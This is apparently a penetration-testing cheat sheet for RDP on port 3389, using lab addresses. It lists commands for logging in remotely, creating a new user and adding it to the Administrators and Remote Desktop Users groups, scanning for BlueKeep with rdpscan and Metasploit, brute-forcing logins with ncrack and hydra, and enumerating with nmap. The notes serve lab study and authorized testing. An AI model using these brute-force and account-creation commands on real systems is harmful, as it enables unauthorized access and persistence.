RDP 3389

1. RDP Login:

To login to a remote machine using RDP:

• Using rdesktop (for older systems):

  rdesktop -u DISCO 10.11.1.13

• Using xfreerdp (more modern, cross-platform):

  xfreerdp /u:admin /v:10.10.10.10 + clipboard

2. Add a User and Grant Privileges:

• Create a User:

  net user redcliff password123 /add

• Add the User to Administrator Group:

  net localgroup Administrators redcliff /add

• Add the User to Remote Desktop Users Group:

  net localgroup "Remote Desktop Users" redcliff /ADD

3. RDP Vulnerability Scanning (BlueKeep):

• Clone rdpscan Repository and run a scan:

  sudo git clone https://github.com/robertdavidgraham/rdpscan.git
  ./rdpscan 10.10.10.10

• Scan for BlueKeep Vulnerability Using Metasploit: First, perform an Nmap scan to identify live RDP targets:

  nmap -p3389 -T5 <subnet>/24 -oG - | awk '/Up$/{print $2}' > rdp.lst

  Then use Metasploit to run the BlueKeep scanner:

  msfconsole
  > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
  > set RHOSTS file:<path to rdp.lst>
  > run

4. Brute-Forcing RDP:

• Brute-force RDP with ncrack:

  ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1
  sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389

• Brute-force RDP with hydra:

  hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13

5. Nmap RDP Enumeration Scripts:

• RDP Service Enumeration:

  nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.11.1.1

• Check for MS12-020 Vulnerability:

  nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11

6. Microsoft Terminal Services (MS-WBT-SERVER):

You can identify the MS Terminal Services (RDP) version and potential vulnerabilities using Nmap:

• Scan for RDP Vulnerabilities (MS-WBT-SERVER):

  nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11

• BlueKeep (CVE-2019-0708)